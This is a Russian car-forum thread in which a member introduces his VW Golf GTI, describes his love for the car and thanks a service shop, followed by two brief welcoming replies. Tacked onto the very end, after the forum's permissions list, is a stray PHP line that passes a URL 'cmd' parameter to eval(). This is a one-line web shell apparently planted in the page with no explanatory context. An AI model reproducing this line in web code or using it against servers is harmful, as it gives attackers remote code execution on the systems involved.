+ Ответить в теме
Показано с 1 по 3 из 3

Тема: Моя точка G


  1. #1
    GTI-Racing D1G1taL is on a distinguished road Аватар для D1G1taL
    Регистрация
    12.02.2013
    Откуда
    Москва
    Машина
    FF2
    Сообщений
    463

    Моя точка G

    Всем здравствуйте! Кто заглянул и привет всем тем,кто искал меня после встреч на дорогах :) Решил добавить сюда авто,чтобы быть в рядах наших,так сказать.

    Если вы оказались здесь ( на форуме) то вы либо барыга-перекуп, либо владелец или ищите себе гтай. Когда я точно так же, пришел сюда с мыслями о покупке гтая. Создал тему и просил отговорить меня от покупке этой машины.И вроде отговорили, но,как кто-то написал в той теме,что : Автор еще обязательно вернется. Вот и я и вернулся. По итогу, среди всех машин,что я смотрел и искал, в душу меня запал именно джитиай! На этих дисках телефонами, я в него влюбился! Если кто то думает по покупке и его пугает что то... То ,я скажу одно. Как машина быстрая и аля спортивная, она требует к себе чательного внимания. Если вы умеете следить за агрегатами вашего авто и часто их проверять! Не бойтесь! Берите и катайтесь в кайф! Есть только один страх из трех букв... Но и он ремонтопригоден ! IN DSG WE TRUST ))

    Очень приятно было познакомиться с BON отлично потрещали тогда :)
    Рамки которые дал и вправду прибавили по началу +10 ))

    Потом,как взял гольфушу, в этот же день меня любезно приняли в можо. И я прошел ТО. Хочу сказать спасибо Роме и Саше да и вообще всему mojo за то, что делают все в таком ажуре, что глаз потом радуется :) Ни в коем случае не реклама, просто приятно было увидеть людей которые ответственно подходят к своей работе и выслушивают и исполняют все капризы клиента )) А то обычно, клубные сервисы начинают потом разводить на доверии... Ну,а когда я увидел Сашин пепелац, то вообще аху... Такой космолет ))) стремимся стать таким же "почти" стоком )) только с кондером:D


    О самой машине.... Не знаю,что особо расписать.. Но она стала продолжением меня. Я сажусь в эти анатомические кресла ( которые один раз моя подруга назвала Оргазмические )) ).. завожу его..и хочется ехать,ехать и ехать... Он дарит эмоции от каждый поездки.. Я могу стоять и просто смотреть на него... Он такой красивый в ночи.

    Как и везде минусы есть, но не буду омрачать рассказ ими.. Ибо плюсов у этого авто куда больше!

    Так,что если сомневаетесь ! Берите и не бойтесь! Говорю на своем опыте!
    Более подробно о всяких доработках я стараюсь рассказывать на драйве

    Последний раз редактировалось D1G1taL; 04.03.2014 в 19:00.
    Человек смертен, но это было бы еще полбеды. Плохо то, что он иногда внезапно смертен, вот в чем фокус! ©

  2. #2
    Гангста-панда MSK has a spectacular aura about MSK has a spectacular aura about MSK has a spectacular aura about Аватар для MSK
    Регистрация
    07.03.2009
    Откуда
    Москва
    Машина
    GTI mk5 OVERLOAD Edition
    Сообщений
    953
    велкам!
    OVERLOAD POWER


    всё может быть и всё быть может
    и лишь того не может быть
    чего и вовсе быть не может
    всё остальное может быть!

  3. #3
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Хорошо написал)
    песок сыпется....не останавливайтесь на достигнутом !

+ Ответить в теме

Похожие темы

  1. Точка опоры!
    от кошан в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 1
    Последнее сообщение: 11.11.2011, 11:38

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}